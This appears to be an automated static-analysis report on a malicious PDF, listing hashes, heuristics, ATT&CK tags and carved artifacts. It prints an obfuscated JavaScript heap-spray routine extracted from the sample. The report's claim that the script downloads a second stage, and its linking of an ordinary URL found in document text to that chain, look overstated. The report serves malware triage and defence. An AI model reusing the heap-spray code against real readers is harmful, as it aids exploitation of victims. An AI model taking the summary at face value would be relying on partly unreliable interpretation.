Malicious PDF — malware analysis report

Static analysis result for SHA-256 0041b0a5060130f2…

MALICIOUS

PDF

67.7 KB First seen: 2013-02-03
MD5: 3ef5f19d4a0146eca63437c1dceb7d2e SHA-1: 338fa77036af688fd842d89b12c9ce3ec7b4b1a6 SHA-256: 0041b0a5060130f2a61aa635f35a70580aa54293a9f8fe437c8c53fcdc6d94ba
68 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment

The sample is a PDF containing obfuscated JavaScript, flagged by ML classifiers as malicious. The script reconstructs and executes a string that appears to be designed to download and execute a second-stage payload. The embedded URL http://www.bitstream.com is likely part of this malicious chain.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Related samples 8

Ranked by shared artifacts, heuristics, extracted URLs, CVEs, and signatures.

Full JSON: related samples API

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x10A83 740 bytes
SHA-256: 057b12456c7cffb9208ee860f5daf31d68116634df0b018cc11cfe45e7361c98
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) )""(nioj.)" "(tilps."" (epak = olygak rav ;epacsenu = epak rav ';
eva(s.split("").reverse().join(""));
font_00_sfnt_off0000035e.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x35E 67284 bytes
SHA-256: 35b6962eeb9aa4a8acb1109b74102eb9d08ab437da4460a890e43cabdc8c59d3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

Open this report in the interactive analyzer, or submit your own file for analysis.